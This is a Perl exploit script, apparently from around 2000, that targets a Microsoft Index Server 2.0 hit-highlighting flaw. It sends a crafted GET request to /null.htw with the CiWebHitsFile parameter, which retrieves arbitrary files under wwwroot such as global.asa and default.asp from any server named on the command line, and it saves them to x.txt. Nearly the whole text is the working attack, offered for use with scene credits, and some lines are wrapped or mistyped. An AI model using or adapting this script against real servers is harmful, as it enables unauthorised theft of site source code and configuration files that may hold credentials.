#!/usr/bin/perl

###########################################################################################
# exploit for Microsoft Index Server 2.0 hithighlight exploit which allows 
you
# to view any file in the wwwroot directory and down.
#
#  sage: perl sourceview.pl www.server.com (files in wwwroot and down)
#                                             /global.asa /default.asp 
etc...
#
$sploitname="\t\t\t\<ms \%20 vuln file snatcher exploit by \\x00\\x00\>\n";
#
###########################################################################################
#
#############################
use IO::Socket;             # special shoutouts to govboi
my ($port, $sock,$server);  # from x00x00
$size=0;                    # ooo2 release
#############################
#
$server="$ARGV[0]";
$s="$server";
$F="";
$port="80";
$cm="$ARGV[1]";
&connect;


sub connect {
$ver="GET /null.htw?CiWebHitsFile=$cm+&CiRestriction=none&CiHiliteType=Full 
HTTP/1.0\n\n";
  my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
open(OUT, ">x.txt");
print $sploitname;
print "\t\<\!\> \<\!\> \<\!\> dumping $cm to x.txt \n";
while(<SOCK>) {
print OUT <SOCK>;
}
close OUT;
$n=0;
$type=2;


close(SOCK);


exit(1);
}